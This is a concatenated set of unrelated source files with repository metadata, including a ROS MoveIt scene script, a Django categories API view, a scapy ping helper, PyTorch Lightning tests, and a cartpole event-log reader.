'batch_size': 50,
'sdim':8,
'adim':4,
'orig_size':[48,64],
'no_pix_distrib': '',
'ncam': 1
}
|
[
"[email protected]"
] | |
78278e990a57092f2ec56732405baf87e7f9f84d
|
1fe8d4133981e53e88abf633046060b56fae883e
|
/venv/lib/python3.8/site-packages/tensorflow/python/layers/normalization.py
|
2ff79b4f2e9ffe0a6b49bfc40e106c0aa66daffd
|
[] |
no_license
|
Akira331/flask-cifar10
|
6c49db8485038731ce67d23f0972b9574746c7a7
|
283e7a2867c77d4b6aba7aea9013bf241d35d76c
|
refs/heads/master
| 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 130 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:6ba7d44e910c3440fadfac158cda4aa0136a4447c84f005b7144e6cd9b29444d
size 17101
|
[
"[email protected]"
] | |
85ae43871dcc3db57959c181396ab5c178961f2e
|
330285bea42e66b1975d62e2f4dd742d4c3ab360
|
/franka_moveit/scripts/create_demo_planning_scene.py
|
9916a164cc43bf4866b219c232f5d029ec8d94c9
|
[
"Apache-2.0"
] |
permissive
|
justagist/franka_ros_interface
|
946182e0430d21a9c119470729d7ec5e96caa404
|
f1f3649a4b030a9191e0577d980680ec95afa6ab
|
refs/heads/master
| 2021-12-24T22:22:14.599033 | 2021-12-22T13:42:30 | 2021-12-22T13:42:30 | 199,485,892 | 130 | 51 |
Apache-2.0
| 2021-05-03T17:11:32 | 2019-07-29T16:07:08 |
Python
|
UTF-8
|
Python
| false | false | 3,226 |
py
|
#!/usr/bin/env python
# /***************************************************************************
#
# @package: franka_moveit
# @metapackage: franka_ros_interface
# @author: Saif Sidhik <[email protected]>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
import sys
import rospy
import moveit_commander
from franka_moveit import ExtendedPlanningSceneInterface
from franka_moveit.utils import create_pose_stamped_msg
"""
A script for creating a simple environment as a PlanningScene. This script runs
by default when interface.launch is started, but can be disabled using argument.
"""
IRLab_workspace = [
{
'name': 'back_wall',
'pose': create_pose_stamped_msg(position = [-0.57,0.0,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.1,1.8,1]
},
{
'name': 'side_wall',
'pose': create_pose_stamped_msg(position = [-0.3,-0.85,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.6,0.1,1]
},
{
'name': 'table',
'pose': create_pose_stamped_msg(position = [0.45,-0.0,0], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [2,1.8,0.02]
},
{
'name': 'controller_box',
'pose': create_pose_stamped_msg(position = [-0.37,0.55,0.08], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.4,0.6,0.16]
},
{
'name': 'equipment_box',
'pose': create_pose_stamped_msg(position = [-0.35,-0.68,0.17], orientation = [1,0,0,0], frame = 'panda_link0'),
'size': [0.46,0.4,0.34]
}
]
def main():
try:
rospy.loginfo("Creating Demo Planning Scene")
scene = ExtendedPlanningSceneInterface()
rospy.sleep(1) # ----- Not having this delay sometimes caused failing to create some boxes
for config in IRLab_workspace:
rospy.loginfo("-- Creating object: {}..".format(config['name']))
success = scene.add_box(**config)
rospy.loginfo("------ {}".format("success" if success else "FAILED!"))
rospy.loginfo("Created Demo Planning Scene.")
except rospy.ROSInterruptException:
return
except KeyboardInterrupt:
return
if __name__ == '__main__':
rospy.init_node('simple_scene_creator',
anonymous=True)
moveit_commander.roscpp_initialize(sys.argv)
main()
|
[
"[email protected]"
] | |
c9905c4f0826bb701e09958514299e45c73b5843
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/173/usersdata/265/86697/submittedfiles/moedas.py
|
a742b7f67e4b1843dcb579ac41fef535ec50768c
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
# -*- coding: utf-8 -*-
a = int(input('digite o valor de a: '))
b = int(input('digite o valor de b: '))
c = int(input('digite o valor de c: '))
for qa in range (0,c,1):
if (((c-(qa*a))%)b==0):
print(qa)
qb=(c-(qa*a))//b
print(qb)
break
else:
print('N')
|
[
"[email protected]"
] | |
ffbb923905cedb23748806a6e5a210f52377acc7
|
c42672aeac984ab3f57d840710e145f4e918ba01
|
/nasws/cnn/search_space/monodepth/analysis.py
|
872b130085e3b8170a5f7d4627a9b3fd1c6b5248
|
[
"MIT"
] |
permissive
|
kcyu2014/nas-landmarkreg
|
00212b6015d1fef3e7198bfa596fa69a898167c2
|
a00c3619bf4042e446e1919087f0b09fe9fa3a65
|
refs/heads/main
| 2023-07-21T19:52:19.392719 | 2021-08-24T09:37:24 | 2021-08-24T09:37:24 | 350,368,390 | 10 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,434 |
py
|
import os
import glob
from collections import defaultdict
from monodepth.utils.reporter import tensorboard_check_tags, tensorboard_load_summary, count_parameters_in_MB_search
from monodepth.utils.checkpointer import load_args
from monodepth.models import MidasNet, MidasNetSearch
from nni.nas.pytorch.fixed import FixedArchitecture
import torch
from monodepth.utils.checkpointer import load_json
from thop import profile
import numpy as np
def sort_tb_pairs(l, ignore_index=True):
slist = list(sorted(l, key=lambda x: x[0]))
if ignore_index:
return list(zip(*slist))[1]
else:
return slist
def average_last_K(l, top_K=5):
return sum(l[-top_K:]) / top_K
def collect_experiment_kdt_from_tensorboard(path):
args = load_args(path + '/args.json')
# print(args)
# store all the results as follow
tb_paths = glob.glob(path + '/log/*')
res = defaultdict()
for p in tb_paths:
# print(p)
tags = tensorboard_check_tags(p)
for t in tags:
steps, r = tensorboard_load_summary(p, t)
if t in res:
res[t] += list(zip(steps, r))
else:
res[t] = list(zip(steps, r))
tag_specified = [
'validation/sparse_kdt_0.0001',
'validation/sparse_spr_0.0001']
final_res = {}
for tag in tag_specified:
d = sort_tb_pairs(res[tag])
final_res[tag] = average_last_K(d)
return final_res
def collect_experiment_result(path):
# the final evaluation model should be recomputed based on the results over server
# load args
args = load_args(path + '/args.json')
# print(args)
# store all the results as follow
tb_paths = glob.glob(path + '/log/*')
res = defaultdict()
for p in tb_paths:
# print(p)
tags = tensorboard_check_tags(p)
for t in tags:
steps, r = tensorboard_load_summary(p, t)
if t in res:
res[t] += list(zip(steps, r))
else:
res[t] = list(zip(steps, r))
# print(res.keys())
# collect the associated statistics
num_epoch = len(res['train/sum'])
num_channels = 256 # fixed across the entire dataset
num_cells = 4
seed = 0
# store all the intermediate results of 1 run.
all_train_loss = sort_tb_pairs(res['train/sum'])
all_valid_loss = sort_tb_pairs(res['validation/ReDWeb'])
train_loss = average_last_K(sort_tb_pairs(res['train/sum']))
valid_loss = average_last_K(sort_tb_pairs(res['validation/ReDWeb']))
# from the current log, this is at is. we do not have more to analyze
# From this point, we need to get the result from checkpoint and store all the statistics accordingly
# use this to directly apply
arch = load_json(path + '/arch.json')
print('processing architecture ',arch)
model = MidasNetSearch(backbone='resnext101_wsl', args=args)
mutator = FixedArchitecture(model, arch)
mutator.reset()
ckpt_path = path + '/checkpoint.pt'
if os.path.exists(ckpt_path):
print('loading checkpoint...')
checkpoint = torch.load(ckpt_path)
model.load_state_dict(checkpoint['model'])
print('finish loading the model ...')
# count parameters
num_param = count_parameters_in_MB_search(model, arch)
return num_epoch, train_loss, valid_loss, num_param, arch, all_train_loss, all_valid_loss
|
[
"[email protected]"
] | |
00868bf5c2508b4f24084132b710bd214998c056
|
524acbbc16eac0ef28da58ff9f79d02d7cadcf1b
|
/backend/shop_time/categories/views.py
|
be8c7d554b3cbf84338a20c5cf0a4fe64763644b
|
[] |
no_license
|
ZandTree/art-shop
|
47eb6ed6f328157c852cef6e324e4be5ab3592f8
|
faa506fb62f845168b9874a720c0b62808245058
|
refs/heads/master
| 2023-06-01T06:40:28.755068 | 2021-06-18T23:53:57 | 2021-06-18T23:53:57 | 376,624,201 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,802 |
py
|
from rest_framework.views import APIView
from .models import Category
from .serializer import CategorySerializer
from rest_framework.permissions import AllowAny
from rest_framework import status
from rest_framework.response import Response
class CategoryList(APIView):
""" get all categories with tree structure"""
permission_classes = (AllowAny,)
def get(self,request,format=None):
"""
loop only for cat and sub_cat == 1 level inclusiveness;
need more: make loop deeper
"""
if Category.objects.all().exists():
categories = Category.objects.all()
result = []
for cat in categories:
if not cat.parent:
item = {}
item['id'] = cat.id
item['name'] = cat.name
item['slug'] = cat.slug
item['sub_categories'] = []
for category in categories:
sub_item = {}
if category.parent and category.parent.id == cat.id:
sub_item['id'] = category.id
sub_item['name'] = category.name
sub_item['sub_categories'] = []
item['sub_categories'].append(sub_item)
result.append(item)
return Response({'categories':result},status=status.HTTP_200_OK)
else:
# instead of 404 ( server error)
return Response({'errors':'No categories found'},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# def get_queryset(self, queryset=None):
#qs = Category.objects.all()
# TODO
# return queryset
# return queryset.get_cached_trees
|
[
"[email protected]"
] | |
d116cf499ae6b5ea0e40f3a62ee8e3bcd94e6a5e
|
824f19d20cdfa26c607db1ff3cdc91f69509e590
|
/random/strings/345. Reverse Vowels of a String.py
|
88e11095e0c062114eea3783f47a5500cedfc1f9
|
[] |
no_license
|
almamuncsit/LeetCode
|
01d7e32300eebf92ab54c983de6e183242b3c985
|
17aa340649574c37067ec170ceea8d9326be2d6a
|
refs/heads/master
| 2021-07-07T09:48:18.069020 | 2021-03-28T11:26:47 | 2021-03-28T11:26:47 | 230,956,634 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 689 |
py
|
class Solution:
def reverseVowels(self, s: str) -> str:
s_list = list(s)
vowels = set({'a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'})
left = 0
right = len(s_list)-1
while right > left:
if s_list[left] in vowels and s_list[right] in vowels:
s_list[left], s_list[right] = s_list[right], s_list[left]
left += 1
right -= 1
else:
if s_list[left] not in vowels:
left += 1
if s_list[right] not in vowels:
right -= 1
return ''.join(s_list)
sol = Solution()
print(sol.reverseVowels("leetcode"))
|
[
"[email protected]"
] | |
68dccaff016d11cce153e1b9db7affab3c07bd9b
|
01ea95d7301b9ad3b84f11c8cbcfe02d00017250
|
/bin/until/echarts/Line.py
|
74f27f3640b6945c26b0de1fc9a04cfdff387304
|
[] |
no_license
|
windyStreet/MQSTATIC
|
82962ae7a43d015dac61cb6ffce8d8853e6774df
|
b5a3d3862bd824b4a08b1c29436e417a9590dcab
|
refs/heads/master
| 2020-12-02T21:13:37.952192 | 2017-07-20T10:20:14 | 2017-07-20T10:20:14 | 96,275,208 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,518 |
py
|
#!/usr/bin/env python
# !-*- coding:utf-8 -*-
import datetime
from bin.until import Logger
from bin.until import Time
from bin.until import Mongo
from bin.until import DBCODE
from bin.until import Filter
from bin.logic import BO
from bin.until import Data
L = Logger.getInstance()
class Line(object):
# search_filter_infos = None, _step = 60, _step_count = 7, _title_text = "数据统计", _type = "line"
def __init__(self, _search_filter_infos, _title_text, _type, _step=60, _step_count=7):
self._search_filter_infos = _search_filter_infos
self._step_count = _step_count
self._step = _step
self._title_text = _title_text
self._type = _type
self.start_time = None
self.end_time = None
def getFileter(self):
pass
def getLineChartData(self):
series = []
_legend_datas = []
for key in self._search_filter_infos:
_legend_data = key
_legend_datas.append(_legend_data)
_search_filter_info = self._search_filter_infos[key]
_project = _search_filter_info['project_name']
self_collection = _search_filter_info['self_collection']
_filter_infos = _search_filter_info['filter_infos']
_statistic_type = _search_filter_info['statistic_type']
_statistic_name = _search_filter_info['statistic_name']
self.start_time = Time.getStartTime(step=self._step, step_count=self._step_count) # 获取起始时间
is_search_db = False
for _filter_info in _filter_infos:
key = _filter_info['key']
relation = _filter_info['relation']
value = _filter_info['value']
if key == 'time' and (relation == DBCODE.GT or relation == DBCODE.GTE):
self.start_time = value # 过滤条件中的起始时间
elif key == 'time' and (relation == DBCODE.LTE or relation == DBCODE.LT):
self.end_time = value # 过滤条件中的终止时间
else:
is_search_db = True
times = Time.getComputeTimes(start_time=self.start_time, end_time=self.end_time, step=self._step)
series_data = [] # y轴上的信息
if is_search_db is True: # 多条件查询
_self_filter = Filter.getInstance()
_self_filter.filter("project", _project, DBCODE.EQ)
_self_filter.filter("type", _statistic_type, DBCODE.EQ)
for _filter_info in _filter_infos:
if _filter_info['key'] != 'time':
_self_filter.filter(_filter_info['key'], _filter_info['value'], _filter_info['relation'])
for i in range(len(times) - 1):
_self_filter.filter("createtime", times[i], DBCODE.GT)
_self_filter.filter("createtime", times[i + 1], DBCODE.LTE)
_filter = _self_filter.filter_json()
count = self_collection.find(_filter).count()
series_data.append(count)
else:
# 计划分批次查询
res_collection = Mongo.getInstance(table=BO.BASE_statistic_res).getCollection()
res_filter = Filter.getInstance()
res_filter.filter("statistical_time", times[0], DBCODE.GT)
res_filter.filter("statistical_time", times[-1], DBCODE.LTE)
res_filter.filter("statistical_step", self._step, DBCODE.EQ)
res_filter.filter("statistical_type", _statistic_type, DBCODE.EQ)
res_filter.filter("statistical_project", _project, DBCODE.EQ)
if Data.isNone(_statistic_name):
_statistic_name = None
res_filter.filter("statistical_name", _statistic_name, DBCODE.EQ)
print(res_filter.filter_json())
ress = res_collection.find(res_filter.filter_json()).sort("statistical_time", -1) # 计算前半部分值
self._step_count = len(times) - 1
series_data = Data.getD4tArr(len=self._step_count, default_value=0) # 坐标轴上的值
# 先来尝试组合数据,发现数据无法组合完整时,补充数据
i = 0
for res in ress:
if i == 0 and ress.count() != (len(times) - 1) and res['statistical_time'] != times[-1]:
# 重新补录一个值
_self_filter = Filter.getInstance()
if not Data.isNone(_statistic_name):
_self_filter.filter("name", _statistic_name, DBCODE.EQ)
_self_filter.filter("project", _project, DBCODE.EQ)
_self_filter.filter("type", _statistic_type, DBCODE.EQ)
_self_filter.filter("createtime", times[-2], DBCODE.GT)
_self_filter.filter("createtime", times[-1], DBCODE.LTE)
_filter = _self_filter.filter_json()
count = self_collection.find(_filter).count()
series_data[i] = count
series_data[i + 1] = res['statistical_count']
i = i + 2
else:
series_data[i] = res['statistical_count']
i = i + 1
series_data.reverse()
xAxis_data = times[1:] # 横坐标轴信息[] 时间信息 去掉首要点
serie = {
"name": _legend_data,
"type": self._type,
"showSymbol":False,
"smooth":True,
# "stack": '总量',
"data": series_data.copy() # 坐标轴上的值
}
series.append(serie)
_result = {
"title": {
"text": self._title_text
},
"legend": {
"data": _legend_datas.copy()
},
"xAxis": {
"data": xAxis_data.copy()
},
"series": series
}
return _result
def getInsatnce(search_filter_infos=None, _title_text="数据统计", _type="line", _step=60, _step_count=7):
if search_filter_infos is None:
L.warn("init Line , not search_filter_infos par")
return None
return Line(search_filter_infos, _title_text, _type, _step, _step_count)
|
[
"[email protected]"
] | |
34f47be9ef55d3d72a7abc700bc1d17d771fd10e
|
f82e67dd5f496d9e6d42b4fad4fb92b6bfb7bf3e
|
/scripts/client/gui/scaleform/daapi/view/meta/serverstatsmeta.py
|
4a28fbbfafb863429e1181c69015f9b805026cc8
|
[] |
no_license
|
webiumsk/WOT0.10.0
|
4e4413ed4e7b00e22fb85d25fdae9400cbb4e76b
|
a84f536c73f86d9e8fab559e97f88f99f2ad7e95
|
refs/heads/master
| 2021-01-09T21:55:00.662437 | 2015-10-23T20:46:45 | 2015-10-23T20:46:45 | 44,835,654 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,339 |
py
|
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ServerStatsMeta.py
from gui.Scaleform.framework.entities.BaseDAAPIComponent import BaseDAAPIComponent
class ServerStatsMeta(BaseDAAPIComponent):
def getServers(self):
self._printOverrideError('getServers')
def relogin(self, id):
self._printOverrideError('relogin')
def isCSISUpdateOnRequest(self):
self._printOverrideError('isCSISUpdateOnRequest')
def startListenCsisUpdate(self, startListenCsis):
self._printOverrideError('startListenCsisUpdate')
def as_setPeripheryChangingS(self, isChanged):
if self._isDAAPIInited():
return self.flashObject.as_setPeripheryChanging(isChanged)
def as_setServersListS(self, servers):
if self._isDAAPIInited():
return self.flashObject.as_setServersList(servers)
def as_disableRoamingDDS(self, disable):
if self._isDAAPIInited():
return self.flashObject.as_disableRoamingDD(disable)
def as_setServerStatsS(self, stats, tooltipType):
if self._isDAAPIInited():
return self.flashObject.as_setServerStats(stats, tooltipType)
def as_setServerStatsInfoS(self, tooltipFullData):
if self._isDAAPIInited():
return self.flashObject.as_setServerStatsInfo(tooltipFullData)
|
[
"[email protected]"
] | |
02a29652ff4002ff213de2e6753b4912bb85ea9e
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_392/ch4_2019_06_05_14_33_33_171155.py
|
cdcdf2b3d67996003e841afaca8af0a2d1c0ff25
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 158 |
py
|
def classifica_idade(x):
if x <= 11:
return'crianca'
elif x >= 12 and x <= 17:
return 'adolescente'
else:
return 'adulto'
|
[
"[email protected]"
] | |
bfc18eaa66e8178ea1f6ceae0421145d57bb023a
|
8821970a489ea190ab7dd6a2da8f672681138543
|
/piston/web/__init__.py
|
acfc64d31c318a7da92d7c776160f900b4897930
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
grey580/piston
|
ab293d449728c9fbcc442adc0463135628548deb
|
5a3472517e2de14e75eb688cf9335b2c98c3e6f4
|
refs/heads/master
| 2021-01-09T05:35:52.587268 | 2017-02-02T09:37:50 | 2017-02-02T09:37:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,583 |
py
|
import re
from ..utils import strfdelta, strfage
from ..storage import configStorage as configStore
from .app import app, socketio
from ..steem import SteemConnector
from . import views, assets
import logging
log = logging.getLogger(__name__)
steem = SteemConnector().getSteem()
__ALL__ = [
"app",
"assets",
"forms",
"socketio",
"views",
]
@app.template_filter('age')
def _jinja2_filter_age(date, fmt=None):
""" Format a datatime as age
"""
return strfage(date, fmt)
@app.template_filter('excert')
def _jinja2_filter_datetime(data):
""" Extract an excert of a post
"""
words = data.split(" ")
return " ".join(words[:100])
@app.template_filter('parseBody')
def _jinja2_filter_parseBody(body):
""" Pre-process the body of a post before
showing in the UI
"""
body = re.sub(
r"^(https?:.*/(.*\.(jpg|png|gif))\??.*)",
r"\n\n",
body, flags=re.MULTILINE)
return body
@app.template_filter('currency')
def _jinja2_filter_currency(value):
""" Format the crypto tokens properly
:param float value: The amount to format as string
"""
return "{:,.3f}".format(value)
def run(port, host):
""" Run the Webserver/SocketIO and app
"""
socketio.run(app,
debug=configStore.get("web:debug"),
host=host,
port=port)
# FIXME: Don't use .run()
# from gevent.wsgi import WSGIServer
# from yourapplication import app
# http_server = WSGIServer(('', 5000), app)
# http_server.serve_forever()
|
[
"[email protected]"
] | |
34d6d85b02c3b8d0e8734802762acb51523c3fa1
|
b56c584ba04de13c7a05f6633893b318eb3fb19d
|
/课后作业/第五天作业/guoqijun/Chapter 12/scapy_ping_one_new.py
|
a64b040c34aa4916e5a8141ec9405dfbff24807a
|
[] |
no_license
|
I318928/Python-Homework
|
42133f1291cc3da90293f994ae1a09dce618bdad
|
139b450f4bf2e4831688df80c12f43edcc00e468
|
refs/heads/master
| 2020-06-01T06:53:50.733061 | 2019-04-17T12:12:16 | 2019-04-17T12:12:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
from scapy.all import *
def qytang_ping(ip):
ping_pkt = IP(dst=ip) / ICMP()
ping_result = sr1(ping_pkt, timeout=1, verbose=False)
if ping_result:
return ip, 1
else:
return ip, 0
if __name__ == '__main__':
result = qytang_ping('192.168.220.129')
if result[1]:
print(result[0], '通!')
else:
print(result[0], '不通!')
|
[
"[email protected]"
] | |
14b05dbce16975b542d6409149a24a4079334f70
|
3b4f985759e44dc169134ae7dcee8e92747c4b01
|
/tests/tests_app/components/multi_node/test_trainer.py
|
249d7868652bb9800f69f27af8365d32b7063452
|
[
"Apache-2.0"
] |
permissive
|
SkafteNicki/pytorch-lightning
|
4b09863bf222241ca7128d13df94ff60b71e50aa
|
7df627b43746a85aa87671bec3e6dada0d98b556
|
refs/heads/master
| 2023-07-15T21:20:02.468216 | 2023-05-04T08:12:33 | 2023-05-04T08:12:33 | 248,216,299 | 3 | 1 |
Apache-2.0
| 2023-07-10T02:40:24 | 2020-03-18T11:44:20 |
Python
|
UTF-8
|
Python
| false | false | 3,538 |
py
|
import os
from copy import deepcopy
from functools import partial
from unittest import mock
import pytest
from lightning_utilities.core.imports import module_available
from lightning_utilities.test.warning import no_warning_call
import pytorch_lightning as pl
from lightning.app.components.multi_node.trainer import _LightningTrainerRunExecutor
def dummy_callable(**kwargs):
t = pl.Trainer(**kwargs)
return t._all_passed_kwargs
def dummy_init(self, **kwargs):
self._all_passed_kwargs = kwargs
def _get_args_after_tracer_injection(**kwargs):
with mock.patch.object(pl.Trainer, "__init__", dummy_init):
ret_val = _LightningTrainerRunExecutor.run(
local_rank=0,
work_run=partial(dummy_callable, **kwargs),
main_address="1.2.3.4",
main_port=5,
node_rank=6,
num_nodes=7,
nprocs=8,
)
env_vars = deepcopy(os.environ)
return ret_val, env_vars
def check_lightning_pytorch_and_mps():
if module_available("pytorch_lightning"):
return pl.accelerators.MPSAccelerator.is_available()
return False
@pytest.mark.skipif(not check_lightning_pytorch_and_mps(), reason="pytorch_lightning and mps are required")
@pytest.mark.parametrize("accelerator_given,accelerator_expected", [("cpu", "cpu"), ("auto", "cpu"), ("gpu", "cpu")])
def test_trainer_run_executor_mps_forced_cpu(accelerator_given, accelerator_expected):
warning_str = (
r"Forcing accelerator=cpu as other accelerators \(specifically MPS\) are not supported "
+ "by PyTorch for distributed training on mps capable devices"
)
if accelerator_expected != accelerator_given:
warning_context = pytest.warns(UserWarning, match=warning_str)
else:
warning_context = no_warning_call(match=warning_str + "*")
with warning_context:
ret_val, env_vars = _get_args_after_tracer_injection(accelerator=accelerator_given)
assert ret_val["accelerator"] == accelerator_expected
@pytest.mark.parametrize(
"args_given,args_expected",
[
({"devices": 1, "num_nodes": 1, "accelerator": "gpu"}, {"devices": 8, "num_nodes": 7, "accelerator": "auto"}),
({"strategy": "ddp_spawn"}, {"strategy": "ddp"}),
({"strategy": "ddp_sharded_spawn"}, {"strategy": "ddp_sharded"}),
],
)
@pytest.mark.skipif(not module_available("torch"), reason="PyTorch is not available")
def test_trainer_run_executor_arguments_choices(
args_given: dict,
args_expected: dict,
):
if pl.accelerators.MPSAccelerator.is_available():
args_expected.pop("accelerator", None) # Cross platform tests -> MPS is tested separately
ret_val, env_vars = _get_args_after_tracer_injection(**args_given)
for k, v in args_expected.items():
assert ret_val[k] == v
assert env_vars["MASTER_ADDR"] == "1.2.3.4"
assert env_vars["MASTER_PORT"] == "5"
assert env_vars["GROUP_RANK"] == "6"
assert env_vars["RANK"] == str(0 + 6 * 8)
assert env_vars["LOCAL_RANK"] == "0"
assert env_vars["WORLD_SIZE"] == str(7 * 8)
assert env_vars["LOCAL_WORLD_SIZE"] == "8"
assert env_vars["TORCHELASTIC_RUN_ID"] == "1"
@pytest.mark.skipif(not module_available("lightning"), reason="lightning not available")
def test_trainer_run_executor_invalid_strategy_instances():
with pytest.raises(ValueError, match="DDP Spawned strategies aren't supported yet."):
_, _ = _get_args_after_tracer_injection(strategy=pl.strategies.DDPStrategy(start_method="spawn"))
|
[
"[email protected]"
] | |
7c0f8ef2e5e76dd512f4593f86eb29756a26e302
|
be6e1acc03149aee1ffbdaa315cf8b7d175fffe9
|
/event_log.py
|
6d347539f3034a82bf2d2298b62c74976e512faf
|
[
"MIT"
] |
permissive
|
rebcabin/cartpoleplusplus
|
763c22d41fc6f13b01a1519da3b51de91cfd03f7
|
f986f495755369f571dcbb9a79d21680b916c0f4
|
refs/heads/master
| 2020-04-05T08:27:28.420983 | 2018-11-24T01:17:47 | 2018-11-24T01:17:47 | 156,716,591 | 0 | 0 |
MIT
| 2018-11-08T14:10:29 | 2018-11-08T14:10:28 | null |
UTF-8
|
Python
| false | false | 6,521 |
py
|
#!/usr/bin/env python
import event_pb2
import gzip
import matplotlib.pyplot as plt
import numpy as np
import StringIO
import struct
def rgb_to_png(rgb):
"""convert RGB data from render to png"""
sio = StringIO.StringIO()
plt.imsave(sio, rgb)
return sio.getvalue()
def png_to_rgb(png_bytes):
"""convert png (from rgb_to_png) to RGB"""
# note PNG is always RGBA so we need to slice off A
rgba = plt.imread(StringIO.StringIO(png_bytes))
return rgba[:,:,:3]
def read_state_from_event(event):
"""unpack state from event (i.e. inverse of add_state_to_event)"""
if len(event.state[0].render) > 0:
num_repeats = len(event.state)
num_cameras = len(event.state[0].render)
eg_render = event.state[0].render[0]
state = np.empty((eg_render.height, eg_render.width, 3,
num_cameras, num_repeats))
for r_idx in range(num_repeats):
repeat = event.state[r_idx]
for c_idx in range(num_cameras):
png_bytes = repeat.render[c_idx].png_bytes
state[:,:,:,c_idx,r_idx] = png_to_rgb(png_bytes)
else:
state = np.empty((len(event.state), 2, 7))
for i, s in enumerate(event.state):
state[i][0] = s.cart_pose
state[i][1] = s.pole_pose
return state
class EventLog(object):
def __init__(self, path, use_raw_pixels):
self.log_file = open(path, "ab")
self.episode_entry = None
self.use_raw_pixels = use_raw_pixels
def reset(self):
if self.episode_entry is not None:
# *sigh* have to frame these ourselves :/
# (a long as a header-len will do...)
buff = self.episode_entry.SerializeToString()
if len(buff) > 0:
buff_len = struct.pack('=l', len(buff))
self.log_file.write(buff_len)
self.log_file.write(buff)
self.log_file.flush()
self.episode_entry = event_pb2.Episode()
def add_state_to_event(self, state, event):
"""pack state into event"""
if self.use_raw_pixels:
# TODO: be nice to have pose info here too in the pixel case...
num_repeats = state.shape[4]
for r_idx in range(num_repeats):
s = event.state.add()
num_cameras = state.shape[3]
for c_idx in range(num_cameras):
render = s.render.add()
render.width = state.shape[1]
render.height = state.shape[0]
render.png_bytes = rgb_to_png(state[:,:,:,c_idx,r_idx])
else:
num_repeats = state.shape[0]
for r in range(num_repeats):
s = event.state.add()
s.cart_pose.extend(map(float, state[r][0]))
s.pole_pose.extend(map(float, state[r][1]))
def add(self, state, action, reward):
event = self.episode_entry.event.add()
self.add_state_to_event(state, event)
if isinstance(action, int):
event.action.append(action) # single action
else:
assert action.shape[0] == 1 # never log batch operations
event.action.extend(map(float, action[0]))
event.reward = reward
def add_just_state(self, state):
event = self.episode_entry.event.add()
self.add_state_to_event(state, event)
class EventLogReader(object):
def __init__(self, path):
if path.endswith(".gz"):
self.log_file = gzip.open(path, "rb")
else:
self.log_file = open(path, "rb")
def entries(self):
episode = event_pb2.Episode()
while True:
buff_len_bytes = self.log_file.read(4)
if len(buff_len_bytes) == 0: return
buff_len = struct.unpack('=l', buff_len_bytes)[0]
buff = self.log_file.read(buff_len)
episode.ParseFromString(buff)
yield episode
def make_dir(d):
if not os.path.exists(d):
os.makedirs(d)
if __name__ == "__main__":
import argparse, os, sys, Image, ImageDraw
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--log-file', type=str, default=None)
parser.add_argument('--echo', action='store_true', help="write event to stdout")
parser.add_argument('--episodes', type=str, default=None,
help="if set only process these specific episodes (comma separated list)")
parser.add_argument('--img-output-dir', type=str, default=None,
help="if set output all renders to this DIR/e_NUM/s_NUM.png")
parser.add_argument('--img-debug-overlay', action='store_true',
help="if set overlay image with debug info")
# TODO args for episode range
opts = parser.parse_args()
episode_whitelist = None
if opts.episodes is not None:
episode_whitelist = set(map(int, opts.episodes.split(",")))
if opts.img_output_dir is not None:
make_dir(opts.img_output_dir)
total_num_read_episodes = 0
total_num_read_events = 0
elr = EventLogReader(opts.log_file)
for episode_id, episode in enumerate(elr.entries()):
if episode_whitelist is not None and episode_id not in episode_whitelist:
continue
if opts.echo:
print "-----", episode_id
print episode
total_num_read_episodes += 1
total_num_read_events += len(episode.event)
if opts.img_output_dir is not None:
dir = "%s/ep_%05d" % (opts.img_output_dir, episode_id)
make_dir(dir)
make_dir(dir + "/c0") # HACK: assume only max two cameras
make_dir(dir + "/c1")
for event_id, event in enumerate(episode.event):
for state_id, state in enumerate(event.state):
for camera_id, render in enumerate(state.render):
assert camera_id in [0, 1], "fix hack above"
# open RGB png in an image canvas
img = Image.open(StringIO.StringIO(render.png_bytes))
if opts.img_debug_overlay:
canvas = ImageDraw.Draw(img)
# draw episode and event number in top left
canvas.text((0, 0), "%d %d" % (episode_id, event_id), fill="black")
# draw simple fx/fy representation in bottom right...
# a bounding box
bx, by, bw = 40, 40, 10
